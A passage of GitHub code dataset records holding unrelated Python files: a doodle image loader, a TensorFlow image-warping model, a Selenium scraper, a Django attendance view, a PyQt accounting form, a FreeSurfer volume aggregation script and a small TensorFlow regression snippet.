doodle in pd.read_csv(file, chunksize=chunksize, usecols=[\"drawing\", \"y\"]):\n doodle[\"drawing\"] = doodle[\"drawing\"].apply(json.loads)\n self.doodles.append(doodle)\n\n self.transform = transform\n\n @staticmethod\n def _draw(raw_strokes, size=256, lw=6, time_color=True):\n BASE_SIZE = 256\n img = np.zeros((BASE_SIZE, BASE_SIZE), np.uint8)\n for t, stroke in enumerate(raw_strokes):\n for i in range(len(stroke[0]) - 1):\n color = 255 - min(t, 10) * 13 if time_color else 255\n _ = cv2.line(img, (stroke[0][i], stroke[1][i]),\n (stroke[0][i + 1], stroke[1][i + 1]), color, lw)\n if size != BASE_SIZE:\n return cv2.resize(img, (size, size))\n else:\n return img\n\n def __len__(self):\n\n return len(self.doodles)\n\n def __getitem__(self, idx):\n doodle = self.doodles[idx]\n # form the batch\n x = np.zeros((len(doodle), 1, self.size, self.size))\n for i, raw_strokes in enumerate(doodle.drawing.values):\n x[i, 0] = self._draw(raw_strokes, size=self.size, lw=2,\n time_color=False)\n label = doodle.y.to_numpy()\n\n if self.transform:\n x = self.transform(x)\n if self.mode == 'train':\n return (x[None] / 255).astype('float32'), label\n else:\n return (x[None] / 255).astype('float32')\n","repo_name":"lanking520/quickdraw","sub_path":"doodle_random.py","file_name":"doodle_random.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73999690707","text":"from __future__ import division, print_function, unicode_literals\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nimport copy\nimport numpy as np\n\nclass networks(object):\n\n def __init__(\n self,\n is_training,\n n_input,\n n_hiddens,\n n_images,\n img_size, \n fixed_image,\n filter_size = 7,\n channels_num = 32,\n X = None,\n indices=None\n ):\n tf.random.set_seed(1)\n self.is_training = is_training\n n_hiddens=copy.deepcopy(n_hiddens)\n self.loss= {}\n\n self.filter_size = filter_size\n self.channels_num = channels_num\n self.img_size = img_size\n self.n_images = n_images\n self.fixed_image = fixed_image \n self.ResizeMethod = 'bicubic'\n n_hiddens.append(n_input)\n\n self.n_input =n_input \n\n self.X = X\n\n self.indices = indices\n self.activation = tf.nn.elu\n initializer = tf.keras.initializers.GlorotNormal()\n self.initializer =initializer\n l_reg = 0.005\n self.regularizer = tf.keras.regularizers.L2(l_reg)\n\n n_layers = len(n_hiddens)\n assert n_layers >= 2\n\n with tf.compat.v1.variable_scope(\"decoder\"):\n self.W=[]\n self.b=[]\n self.t = tf.compat.v1.get_variable(name=\"t\", shape=(n_images,n_hiddens[0]), dtype=tf.float32, initializer= initializer, regularizer=self.regularizer)\n\n for i in range(1,n_layers):\n layer = str(i)\n\n self.W.append( tf.compat.v1.get_variable(name=\"deep_Weight_\"+layer, shape=(n_hiddens[i-1], n_hiddens[i]), dtype=tf.float32, initializer= initializer, regularizer=self.regularizer) )\n\n self.b.append(tf.compat.v1.get_variable(name=\"deep_bias_\"+layer, shape=(n_hiddens[i]) , dtype=tf.float32, initializer= tf.zeros_initializer))\n\n with tf.compat.v1.variable_scope(\"inputs\"):\n height,width,_= img_size\n self.z = tf.compat.v1.get_variable(name=\"z\", shape=(n_images,height//8, width//8,1), dtype=tf.float32, initializer= tf.keras.initializers.VarianceScaling())\n\n with tf.compat.v1.variable_scope(\"params\"): \n self.illum = tf.compat.v1.get_variable(name=\"illumination\", shape=(n_images,n_input), dtype=tf.float32, initializer= initializer, regularizer=self.regularizer)\n\n def net(self, t, W, b):\n \n hidden = t\n \n for i in range(0,len(W)-1):\n hidden = tf.matmul(hidden, W[i]) + b[i]\n hidden = tf.compat.v1.layers.batch_normalization(hidden, training=self.is_training)\n hidden = self.activation(hidden)\n \n X_hat = tf.nn.sigmoid(tf.matmul(hidden, W[-1]) + b[-1])\n return X_hat \n\n def conv_decoder(self, hidden , scale):\n stride=2\n batch_size = tf.shape(hidden)[0]\n _,input_height,input_width,in_channels = hidden.get_shape()\n filter_size = self.filter_size\n channels_num = self.channels_num\n\n \n with tf.compat.v1.variable_scope(scale, reuse=tf.compat.v1.AUTO_REUSE):\n \n out_channels=channels_num\n shape =[filter_size, filter_size, in_channels, out_channels]\n w_conv1 = tf.compat.v1.get_variable(\n name='W_conv1',\n shape=shape,\n initializer=self.initializer,\n regularizer=self.regularizer\n ) \n conv1 = tf.nn.conv2d(\n hidden,\n w_conv1,\n strides=[1, 1, 1, 1],\n padding=\"SAME\") \n conv1 =self.activation(conv1)\n \n \n in_channels = channels_num\n out_channels = channels_num\n shape = [filter_size, filter_size, out_channels, in_channels]\n W_deconv1 = tf.compat.v1.get_variable(\n name='W_deconv1',\n shape=shape,\n initializer=self.initializer,\n regularizer=self.regularizer\n )\n output_shape = [batch_size,input_height*stride,input_width*stride, out_channels]\n deconv1 = tf.nn.conv2d_transpose(conv1, W_deconv1, output_shape, strides=[1, 2, 2, 1], padding=\"SAME\")\n deconv1 =self.activation(deconv1)\n \n \n in_channels = channels_num\n out_channels = channels_num\n shape =[filter_size, filter_size, in_channels, out_channels]\n w_conv2 = tf.compat.v1.get_variable(\n name='W_conv2',\n shape=shape,\n initializer=self.initializer,\n regularizer=self.regularizer\n ) \n conv2 = tf.nn.conv2d(\n deconv1,\n w_conv2,\n strides=[1, 1, 1, 1],\n padding=\"SAME\") \n conv2 =self.activation(conv2) \n \n out_channels = 2\n in_channels = channels_num\n shape = [filter_size, filter_size, out_channels, in_channels]\n W_deconv2 = tf.compat.v1.get_variable(\n name='W_deconv2',\n shape=shape,\n initializer=self.initializer,\n regularizer=self.regularizer\n ) \n output_shape = [batch_size,input_height*stride,input_width*stride, out_channels]\n deconv2 = tf.nn.conv2d_transpose(conv2, W_deconv2,output_shape, strides=[1, 1, 1, 1], padding=\"SAME\")\n deconv2 =self.activation(deconv2)\n\n return deconv1,deconv2 \n\n def warp(self, X , z ):\n \n X = tf.reshape(X,(-1,*self.img_size))\n _,h,w,c = X.shape \n scale1_4=[(h//8)*2,(w//8)*2]\n scale1_2=[(h//8)*4,(w//8)*4] \n X1_4 = tf.image.resize(X,scale1_4,method=self.ResizeMethod)\n X1_2 = tf.image.resize(X,scale1_2,method=self.ResizeMethod)\n \n z = tf.gather(z,self.indices)\n z1,f1_4 = self.conv_decoder(z,\"scale_1\")\n z2,f1_2 = self.conv_decoder(z1,\"scale_2\")\n _,f1 = self.conv_decoder(z2,\"scale_3\")\n \n _,input_height,input_width,_ = f1_4.get_shape()\n T1_4=f1_4 \n T1_2 = f1_2 + tf.image.resize(T1_4,[input_height*2,input_width*2],method=self.ResizeMethod)\n T1 = f1 + tf.image.resize(T1_2,[input_height*4,input_width*4],method=self.ResizeMethod)\n\n warped_X = tfa.image.dense_image_warp(X,T1,name='dense_image_warp_1')\n warped_X =tf.reshape(warped_X,(-1,self.n_input))\n \n warped_X1_2 = tfa.image.dense_image_warp(X1_2,T1_2,name='dense_image_warp_1_2')\n size=scale1_2[0]*scale1_2[1]*c\n warped_X1_2 =tf.reshape(warped_X1_2,(-1,size))\n \n warped_X1_4 = tfa.image.dense_image_warp(X1_4,T1_4,name='dense_image_warp_1_4') \n size=scale1_4[0]*scale1_4[1]*c\n warped_X1_4 =tf.reshape(warped_X1_4,(-1,size)) \n \n T1_loss = tf.reduce_mean(tf.reduce_sum(tf.square( tf.abs(T1)),axis=1))\n T1_2loss = tf.reduce_mean(tf.reduce_sum(tf.square( tf.abs(T1_2)),axis=1))\n T1_4loss = tf.reduce_mean(tf.reduce_sum(tf.square( tf.abs(T1_4)),axis=1))\n \n return T1, warped_X, warped_X1_2, warped_X1_4, T1_loss, T1_2loss, T1_4loss\n\n def get_scale_losses(self, warped_X1_4, warped_X1_2, warped_X):\n\n I_fixed=tf.reshape(self.fixed_image,(1,*self.img_size))\n \n _,h,w,c = I_fixed.shape \n scale1_4=[(h//8)*2,(w//8)*2]\n scale1_2=[(h//8)*4,(w//8)*4] \n \n I_fixed1_4 = tf.image.resize(I_fixed,scale1_4,method=self.ResizeMethod)\n I_fixed1_2 = tf.image.resize(I_fixed,scale1_2,method=self.ResizeMethod)\n \n size=scale1_4[0]*scale1_4[1]*c \n I_fixed1_4 = tf.reshape(I_fixed1_4 ,(1,size))\n I_fixed1_4 =tf.cast(I_fixed1_4,tf.float32)\n diff = tf.abs(I_fixed1_4 -warped_X1_4)\n loss1 = tf.reduce_mean(tf.reduce_sum(tf.square(diff),axis=1))\n \n size=scale1_2[0]*scale1_2[1]*c \n I_fixed1_2 = tf.reshape(I_fixed1_2 ,(1,size))\n I_fixed1_2 =tf.cast(I_fixed1_2,tf.float32)\n diff = tf.abs(I_fixed1_2 -warped_X1_2)\n loss2 = tf.reduce_mean(tf.reduce_sum(tf.square(diff),axis=1))\n \n I_fixed = tf.reshape(I_fixed,(1,self.n_input))\n I_fixed =tf.cast(I_fixed,tf.float32)\n diff = tf.abs(I_fixed -warped_X)\n loss3 = tf.reduce_mean(tf.reduce_sum(tf.square(diff),axis=1))\n \n return loss1, loss2, loss3 \n\n def get_loss(self):\n reg_loss = tf.reduce_mean(tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.REGULARIZATION_LOSSES))\n self.flow, warped_X, warped_X1_2, warped_X1_4, T1_loss, T1_2loss, T1_4loss = self.warp( self.X , self.z )\n self.warped_img = warped_X\n \n beta = 1\n T_loss = 1*T1_loss + beta*T1_2loss + beta*beta*T1_4loss\n loss1, loss2, loss3 = self.get_scale_losses( warped_X1_4, warped_X1_2, warped_X)\n beta = 0.25\n loss_1_2_3 = 1*loss1 + beta*loss2 + beta*beta*loss3\n warping_loss = 1*loss_1_2_3 + 1*T_loss\n t = tf.gather(self.t,self.indices)\n X_hat= self.net(t,self.W,self.b)\n self.X_hat_0=X_hat\n diff = tf.abs(warped_X - X_hat)\n reconstruction_loss = tf.reduce_mean(tf.reduce_sum(diff, axis=1)) \n \n foreground = warped_X - X_hat\n foreground = tf.reshape(foreground,(-1,*self.img_size))\n warped_foreground = tfa.image.dense_image_warp(foreground,-1*self.flow,name='foreground_image_warp')\n self.warped_foreground =tf.reshape(warped_foreground,(-1,self.n_input))\n \n total_loss = reg_loss + 1*warping_loss + 0.1*reconstruction_loss\n \n self.loss = {'total_loss':total_loss, 'warping_loss':warping_loss,'loss_1_2_3 ':loss_1_2_3 , 'loss1':loss1,'loss2':loss2,'loss3':loss3,'T_loss':T_loss,'T1_loss':T1_loss,'T1_2loss':T1_2loss, 'T1_4loss':T1_4loss,'reconstruction_loss':reconstruction_loss,'reg_loss':reg_loss }\n\n return self.loss,self.warped_img\n","repo_name":"FatemeBahri/DBSGen","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7216889264","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\noption = webdriver.ChromeOptions()\noption.add_experimental_option(\"detach\",True)\n\ndriver = webdriver.Chrome(options=option)\n\nurl = \"https://www.python.org/\"\n\n\ndriver.get(url)\nevent_time = driver.find_elements(By.CSS_SELECTOR,value=\".event-widget time\")\nevent_name = driver.find_elements(By.CSS_SELECTOR,value=\".event-widget li a\")\n\nevent = {}\n\nfor n in range(len(event_time)):\n event[n] = {\n \"time\" : event_time[n].text,\n \"name\" : event_name[n].text\n }\n\nprint(event)\n\n\n\n\ndriver.quit()\n\n","repo_name":"lusiusfebry/100-days-python","sub_path":"Project/Day-48_Selenium/challange-1.py","file_name":"challange-1.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26757030356","text":"from django.shortcuts import render_to_response, redirect\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib import auth\nfrom django.views.decorators.csrf import csrf_exempt\nfrom login.models import UserProfile, AttendLog\nimport datetime\nimport json\n# Create your views here.\n\ndef login(request):\n if request.method == 'POST':\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n return HttpResponseRedirect(\"/profile/\")\n return render_to_response(\"login.html\", RequestContext(request))\n\n\ndef profile(request):\n if request.user.is_authenticated():\n info = {\n \"username\": request.user.username,\n }\n return render_to_response(\"profile.html\", RequestContext(request, info))\n else:\n return redirect('login.views.login')\n\n@csrf_exempt\ndef clockin(request):\n if request.user.is_authenticated():\n try:\n user = UserProfile.objects.get(user=request.user)\n except UserProfile.DoesNotExist:\n user = UserProfile.objects.create(user=request.user)\n try:\n log = user.attendlog_set.get(date=datetime.date.today())\n except AttendLog.DoesNotExist:\n log = AttendLog.objects.create(user=user, date=datetime.date.today())\n period = request.POST.get('period', '')\n sheet = {}\n if log[period] is None:\n log[period] = datetime.datetime.now().time()\n log.save()\n thislog = user.attendlog_set.all()[:10]\n for index in range(thislog.count()):\n sheet[index] = {\n \"date\": str(thislog[index].date),\n \"morning\": str(thislog[index].morning)[:5],\n \"afternoon\": str(thislog[index].afternoon)[:5],\n \"evening\": str(thislog[index].evening)[:5],\n }\n return HttpResponse(json.dumps(sheet))\n","repo_name":"Lw-Cui/gmsite","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73938694224","text":"import sys\nfrom PyQt5.QtWidgets import QApplication,QDialog,QMessageBox, QTableWidgetItem\nfrom PyQt5 import uic\nfrom form_libro_iva_ventas_nuevo import Ui_form_libro_iva_ventas_nuevo\nfrom PyQt5.QtCore import pyqtRemoveInputHook\nfrom E_plan_cuentas import E_plan_cuentas\nfrom E_ejercicio import E_ejercicio\nfrom E_cliente import E_cliente\nfrom E_proveedor import E_proveedor\nfrom E_libro_iva_venta import E_libro_iva_ventas\nfrom E_ejercicio_detalle import E_ejercicio_detalle\n\nclass libro_iva_ventas_nuevo(QDialog):\n obj_form= Ui_form_libro_iva_ventas_nuevo()\n lista_ejercicio = \"\"\n lista_proveedor = \"\"\n\n def __init__(self):\n QDialog.__init__(self)\n obj_form= Ui_form_libro_iva_ventas_nuevo()\n self.obj_form.setupUi(self)\n self.obj_form.btn_buscar.clicked.connect(self.buscar)\n self.obj_form.pushButton_2.clicked.connect(self.pushButton_2)\n\n self.obj_form.lne_10_5.editingFinished.connect(self.sumar)\n self.obj_form.lne_21.editingFinished.connect(self.sumar)\n self.obj_form.lne_monotrib.editingFinished.connect(self.sumar)\n self.obj_form.lne_no_grav.editingFinished.connect(self.sumar)\n self.obj_form.lne_iibb.editingFinished.connect(self.sumar)\n self.obj_form.lne_27.editingFinished.connect(self.sumar)\n self.obj_form.lne_iva.editingFinished.connect(self.sumar)\n self.obj_form.lne_otros.editingFinished.connect(self.sumar)\n self.obj_form.lne_percepcion_iva.editingFinished.connect(self.sumar)\n\n def sumar(self):\n suma1 = float(self.obj_form.lne_10_5.text()) + float(self.obj_form.lne_21.text())\n suma2 = float(self.obj_form.lne_monotrib.text()) + float(self.obj_form.lne_no_grav.text()) + float(self.obj_form.lne_iibb.text())\n suma3 = float(self.obj_form.lne_27.text()) + float(self.obj_form.lne_iva.text()) + float(self.obj_form.lne_otros.text())\n suma4 = float(self.obj_form.lne_percepcion_iva.text())\n total = suma1 + suma2 + suma3 + suma4\n self.obj_form.lne_resultado.setText(str(total))\n\n def limpiar(self):\n self.obj_form.cbx_proveedor.clear()\n self.obj_form.cbx_ejercicio.clear()\n self.lista_ejercicio = \"\"\n self.lista_proveedor = \"\"\n self.lista_ejercicio_detalle = \"\"\n\n def buscar(self):\n self.limpiar()\n\n #self.limpiar()\n if self.obj_form.lne_cuit.text() !=\"\":\n cuit = self.obj_form.lne_cuit.text()\n obj_e_cliente= E_cliente()\n self.obj_cliente = obj_e_cliente.get_cliente_cuit_cuil(cuit)\n if self.obj_cliente == False :\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('No se encontro el cliente')\n msgBox.exec_()\n else:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('Cliente OK')\n msgBox.exec_()\n self.obj_form.lne_razon_social.setText(self.obj_cliente.razon_social)\n\n obj_e_proveedor = E_proveedor()\n self.lista_proveedor = obj_e_proveedor.buscar_proveedores(self.obj_cliente.id_cliente)\n for item in self.lista_proveedor:\n self.obj_form.cbx_proveedor.addItem(item.nombre)\n\n obj_e_ejercicio = E_ejercicio()\n self.lista_ejercicio = obj_e_ejercicio.get_ejercicio_id_cliente(self.obj_cliente.id_cliente)\n for item in self.lista_ejercicio:\n self.obj_form.cbx_ejercicio.addItem(item.descripcion)\n\n\n\n def pushButton_2(self):\n\n obj_e_E_libro_iva_ventas = E_libro_iva_ventas()\n obj_e_E_libro_iva_ventas.fecha = self.obj_form.dte_fec_nuevo.text()\n obj_e_E_libro_iva_ventas.nro_comprobante = self.obj_form.lne_comprbante.text()\n obj_proveedor = \"\"\n for item in self.lista_proveedor:\n if self.obj_form.cbx_proveedor.currentText() == item.nombre:\n obj_proveedor = item\n\n obj_e_E_libro_iva_ventas.id_proveedor = obj_proveedor.id_proveedor\n obj_e_E_libro_iva_ventas.tipo = self.obj_form.cbx_tipo.currentText()\n obj_e_E_libro_iva_ventas.neto_10_5 = self.obj_form.lne_10_5.text()\n obj_e_E_libro_iva_ventas.neto_21 = self.obj_form.lne_21.text()\n obj_e_E_libro_iva_ventas.neto_27 = self.obj_form.lne_27.text()\n obj_e_E_libro_iva_ventas.neto_27 = self.obj_form.lne_27.text()\n obj_e_E_libro_iva_ventas.iva = self.obj_form.lne_iva.text()\n obj_e_E_libro_iva_ventas.monotributo = self.obj_form.lne_monotrib.text()\n obj_e_E_libro_iva_ventas.impuestos_otros = self.obj_form.lne_otros.text()\n obj_e_E_libro_iva_ventas.percepcion_iva = self.obj_form.lne_percepcion_iva.text()\n obj_e_E_libro_iva_ventas.percepcion_IBB = self.obj_form.lne_iibb.text()\n #obj_e_E_libro_iva_ventas.ref = self.obj_form.lne_ref.text()\n obj_e_E_libro_iva_ventas.no_gravado = self.obj_form.lne_no_grav.text()\n obj_e_E_libro_iva_ventas.id_cliente = self.obj_cliente.id_cliente\n #pyqtRemoveInputHook()\n #import pdb;pdb.set_trace()\n obj_ejercicio = \"\"\n for item in self.lista_ejercicio:\n if item.descripcion == self.obj_form.cbx_ejercicio.currentText():\n obj_ejercicio= item\n\n obj_e_E_libro_iva_ventas.id_ejercicio = obj_ejercicio.id_ejercicio\n\n obj_E_ejercicio_detalle = E_ejercicio_detalle()\n self.lista_ejercicio_detalle = obj_E_ejercicio_detalle.buscar_ejercicios_id_ejercicio(obj_ejercicio.id_ejercicio)\n obj_ejercicio_detalle = \"\"\n for item in self.lista_ejercicio_detalle:\n if item.mes == self.obj_form.cbx_mes.currentText():\n obj_ejercicio_detalle=item\n obj_e_E_libro_iva_ventas.id_ejercicio_detalle = obj_ejercicio_detalle.id_ejercicio_detalle\n\n\n obj_e_E_libro_iva_ventas.guardar(obj_e_E_libro_iva_ventas)\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('Registro guardado OK')\n msgBox.exec_()\n","repo_name":"lriccombene/sgc1","sub_path":"w_form_libro_iva_ventas_nuevo.py","file_name":"w_form_libro_iva_ventas_nuevo.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5676369303","text":"from env import *\nimport pandas as pd\nimport numpy as np\n\n\ndef agregateFSDataDRC():\n\n\n drcFSSubjDir = '/home/razvan/seagate/DRC_data/fs_subjects'\n exportSubjCmd = 'export SUBJECTS_DIR=%s' % drcFSSubjDir\n exportFreeSurfCmd = 'export FREESURFER_HOME=%s; source %s/SetUpFreeSurfer.sh' \\\n % (freesurfPath, freesurfPath)\n\n from glob import glob\n subjFlds = [x.split('/')[-2] for x in glob(\"%s/*/\" % drcFSSubjDir)]\n\n\n # subjFlds = [x[0] for x in os.walk(drcFSSubjDir)]\n\n # print('subjFlds', subjFlds)\n # print(asd)\n\n subjListStr = ' '.join(subjFlds)\n print(subjListStr)\n runAggreg = False\n\n subcortProg = 'asegstats2table'\n subcortOutFile = 'drcFSXSubcort.csv'\n subcortFsAggCmd = '%s ; %s; %s/bin/%s --subjects %s --meas volume --skip ' \\\n '--tablefile %s --delimiter=comma ' % (exportSubjCmd, exportFreeSurfCmd,\n freesurfPath, subcortProg, subjListStr, subcortOutFile)\n print(subcortFsAggCmd)\n if runAggreg:\n os.system(subcortFsAggCmd)\n dfSubcort = pd.read_csv(subcortOutFile)\n\n cortProg = 'aparcstats2table'\n cortLhOutFile = 'drcFSXCortLh.csv'\n cortLhFsAggCmd = '%s ; %s; %s/bin/%s --subjects %s --meas volume --hemi lh --skip ' \\\n '--tablefile %s --delimiter=comma ' % (exportSubjCmd, exportFreeSurfCmd,\n freesurfPath, cortProg, subjListStr, cortLhOutFile)\n print(cortLhFsAggCmd)\n if runAggreg:\n os.system(cortLhFsAggCmd)\n dfCortLh = pd.read_csv(cortLhOutFile)\n\n cortRhOutFile = 'drcFSXCortRh.csv'\n cortRhFsAggCmd = '%s ; %s; %s/bin/%s --subjects %s --meas volume --hemi rh --skip ' \\\n '--tablefile %s --delimiter=comma ' % (exportSubjCmd, exportFreeSurfCmd,\n freesurfPath, cortProg, subjListStr, cortRhOutFile)\n print(cortRhFsAggCmd)\n if runAggreg:\n os.system(cortRhFsAggCmd)\n dfCortRh = pd.read_csv(cortRhOutFile)\n\n assert dfSubcort.shape[0] == dfCortLh.shape[0] == dfCortRh.shape[0]\n\n dfAll = dfSubcort\n dfAll[dfCortLh.columns] = dfCortLh\n dfAll[dfCortRh.columns] = dfCortRh\n\n # print(adss)\n dfAll['partCode'] = [int(x.split('-')[0][4:]) for x in dfAll['Measure:volume']]\n dfAll['studyID'] = [int(x.split('-')[2]) for x in dfAll['Measure:volume']]\n\n # print(np.where(dfAll['studyID'] == 0))\n # print(asd)\n # there's two rows with the same scanID 3560. Idential FS volumes\n # suggest this scan is duplicated. Drop both of them.\n print(np.where(dfAll['studyID'] == 3560))\n idxToDrop = np.where(np.in1d(dfAll['studyID'], [3560, 0]))[0]\n # idxToDrop = np.logical_or(dfAll['studyID'] == 3560, np.in1d(dfAll.partCode == 1222))\n dfAll.drop(dfAll.index[idxToDrop], inplace=True)\n dfAll.reset_index(drop=True, inplace=True)\n\n print(np.where(dfAll['studyID'] == 3560))\n # print(ads)\n\n return dfAll\n\ndef addMetadataDrc(dfAll):\n ############ load medatada - age, gender, ... ###########\n\n # load metadata in order to get the timepoint information for each subj id\n metaData = sio.loadmat('pcaData.mat')\n\n print(metaData.keys())\n partCode = metaData['participantCode']\n diag = metaData['pcaDiag']\n ageAtScan = metaData['ageAtScan']\n studyID = metaData['studyID']\n gender = metaData['gender']\n # subgroupPCA = metaData['subgroupPCA']\n # subgroupPCA = ageAtScan\n\n print(dfAll['studyID'].shape)\n # print(ads)\n nrSubjCross = dfAll.shape[0]\n unqPart = np.unique(dfAll['partCode'])\n nrUnqPart = unqPart.shape[0]\n\n ageAtScanDf = np.nan * np.ones(nrSubjCross, float)\n genderDf = np.nan * np.ones(nrSubjCross, float)\n diagDf = np.nan * np.ones(nrSubjCross, float)\n Month_blDf = np.nan * np.ones(nrSubjCross, float)\n\n # print('studyID.shape', studyID.shape, np.unique(studyID).shape)\n # print()\n # print(asd)\n # print('age 3560 ', ageAtScan[studyID == 3560])\n # print('gender 3560 ', gender[studyID == 3560])\n # print('diag 3560 ', diag[studyID == 3560])\n # print('partCode 3560 ', partCode[studyID == 3560])\n\n for s in range(nrSubjCross):\n # print(dfAll['studyID'][s])\n # print(dfAll['studyID'][s] == studyID)\n idx = (dfAll['studyID'][s] == studyID).reshape(-1)\n if np.sum(idx) > 1:\n print(dfAll['studyID'][s])\n\n if np.sum(idx) == 1:\n # print(ageAtScan[idx])\n ageAtScanDf[s] = ageAtScan[idx]\n genderDf[s] = gender[idx]\n diagDf[s] = diag[idx]\n\n # print(adsa)\n\n for p in range(nrUnqPart):\n currPartIndDf = dfAll['partCode'] == unqPart[p]\n ageCurrPartDf = ageAtScanDf[currPartIndDf]\n Month_blDf[currPartIndDf] = (ageCurrPartDf - np.min(ageCurrPartDf))*12.0\n\n\n dfAll['ageAtScan'] = ageAtScanDf\n dfAll['gender'] = genderDf\n dfAll['diag'] = diagDf\n dfAll['Month_bl'] = Month_blDf\n\n return dfAll\n\n ##############\n\ndef loadDRC(drcFile, columnsFormat):\n # first use Freesurfer to aggregate all the volume information into one csv file\n\n df = agregateFSDataDRC()\n\n df = addMetadataDrc(df)\n # print(adssa)\n columnsFormat = columnsFormat[1:]\n # print(columnsFormat)\n # print(asd)\n\n dataDf = pd.DataFrame(np.nan * np.ones((df.shape[0], len(columnsFormat))),\n columns=columnsFormat)\n print(dataDf.columns)\n dataDf.reindex(range(df.shape[0]))\n dataDf[['RID', 'Month_bl', 'scanID']] = df[['partCode', 'Month_bl', 'studyID']]\n\n # dataDf.rename(index=str, columns={\"partCode\": \"RID\"}, inplace=True)\n # print(dataDf.loc[:10,:])\n\n # print(list(df.columns))\n # print(ads)\n\n # add ageDrc, genderDrc, ICVTadpoleDrc, dataset\n dataDf['age'] = df['ageAtScan']\n dataDf['gender-0f1m'] = df['gender']\n dataDf['dataset'] = 2 # number identifying current dataset\n dataDf['diag'] = df['diag']\n\n print(dataDf['diag'])\n mapDiagDRC = {1: CTL2, 2: PCA, 3: AD2}\n dataDf['diag'] = dataDf['diag'].map(mapDiagDRC)\n # print(asd)\n\n ######## MRI biomk selection ################\n\n\n\n\n '''\n Frontal\n\n Superior Frontal\n Rostral and Caudal Middle Frontal\n Pars Opercularis, Pars Triangularis, and Pars Orbitalis\n Lateral and Medial Orbitofrontal\n Precentral\n Paracentral\n Frontal Pole\n\n Parietal\n\n Superior Parietal\n Inferior Parietal\n Supramarginal\n Postcentral\n Precuneus\n\n Temporal\n\n Superior, Middle, and Inferior Temporal\n Banks of the Superior Temporal Sulcus\n Fusiform\n Transverse Temporal\n Entorhinal\n Temporal Pole\n Parahippocampal\n\n Occipital\n\n Lateral Occipital\n Lingual\n Cuneus\n Pericalcarine\n\n Cingulate (if you want to include in a lobe)\n\n Rostral Anterior (Frontal)\n Caudal Anterior (Frontal)\n Posterior (Parietal)\n Isthmus (Parietal)\n\n '''\n\n volBiomkStruct = {\n 'ICV' : ['EstimatedTotalIntraCranialVol'],\n 'Volume Frontal' : ['lh_caudalmiddlefrontal_volume',\n 'lh_lateralorbitofrontal_volume', 'lh_medialorbitofrontal_volume',\n 'lh_rostralmiddlefrontal_volume', 'lh_superiorfrontal_volume',\n 'lh_frontalpole_volume', 'lh_paracentral_volume',\n 'lh_parsopercularis_volume', 'lh_parsorbitalis_volume',\n 'lh_parstriangularis_volume', 'lh_precentral_volume',\n 'lh_rostralmiddlefrontal_volume'],\n 'Volume Parietal' : ['lh_inferiorparietal_volume',\n 'lh_postcentral_volume', 'lh_precuneus_volume',\n 'lh_superiorparietal_volume'],\n 'Volume Temporal' : ['lh_entorhinal_volume', 'lh_fusiform_volume',\n 'lh_inferiortemporal_volume', 'lh_middletemporal_volume',\n 'lh_parahippocampal_volume', 'lh_superiortemporal_volume',\n 'lh_supramarginal_volume', 'lh_temporalpole_volume',\n 'lh_transversetemporal_volume'],\n 'Volume Occipital' : ['lh_cuneus_volume', 'lh_lateraloccipital_volume',\n 'lh_lingual_volume', 'lh_pericalcarine_volume', ],\n 'Volume Cingulate' : ['lh_caudalanteriorcingulate_volume',\n 'lh_isthmuscingulate_volume', 'lh_posteriorcingulate_volume',\n 'lh_rostralanteriorcingulate_volume', ],\n 'Volume Hippocampus': ['Left-Hippocampus', 'Right-Hippocampus']\n }\n\n for k in volBiomkStruct.keys():\n volBiomkStruct[k] += ['rh%s' % x[2:] for x in volBiomkStruct[k]\n if x[:2] == 'lh']\n\n dataDf = addBiomks(volBiomkStruct, df, dataDf, collapseFunc=np.sum)\n\n cogTestsDf = None\n # print(dataDf.loc[:10,:])\n # print(ads)\n\n return dataDf\n","repo_name":"razvanmarinescu/dkt","sub_path":"drcDataLoader.py","file_name":"drcDataLoader.py","file_ext":"py","file_size_in_byte":8044,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"11957656346","text":"# Fetch batch function:\n\ndef fetch_batch(epoch, batch_index, batch_size): \n return X_batch, y_batch\n\n\n# Set up computational graph:\n\nimport tensorflow as tf\nreset_graph ()\n\nn_epochs = 1000\nlearning_rate = 0.01\n\nX = tf.constant(scaled_housing_data_plus_bias, dtype=tf.float32, name=\"X\")\ny = tf.constant(housing_data_target, dtype=tf.float32, name=\"y\")\n\ntheta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0), name=\"theta\")\ny_pred = tf .matmul(X, theta , name=\"predictions\")\nerror = y_pred - y\nmse = tf.reduce_mean(tf.square(error), name=\"mse\")\noptimizer = tf.train.GradientDescentOptimizer(learning_rate)\ntraining_op = optimizer.minimize(mse)\n\n\n# Execute:\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE=\", mse.eval())\n sess.run(training_op)\n best_theta = theta.eval()\n\n\n","repo_name":"johnduffymsc/msc_spce0038assessment","sub_path":"question_4f.py","file_name":"question_4f.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 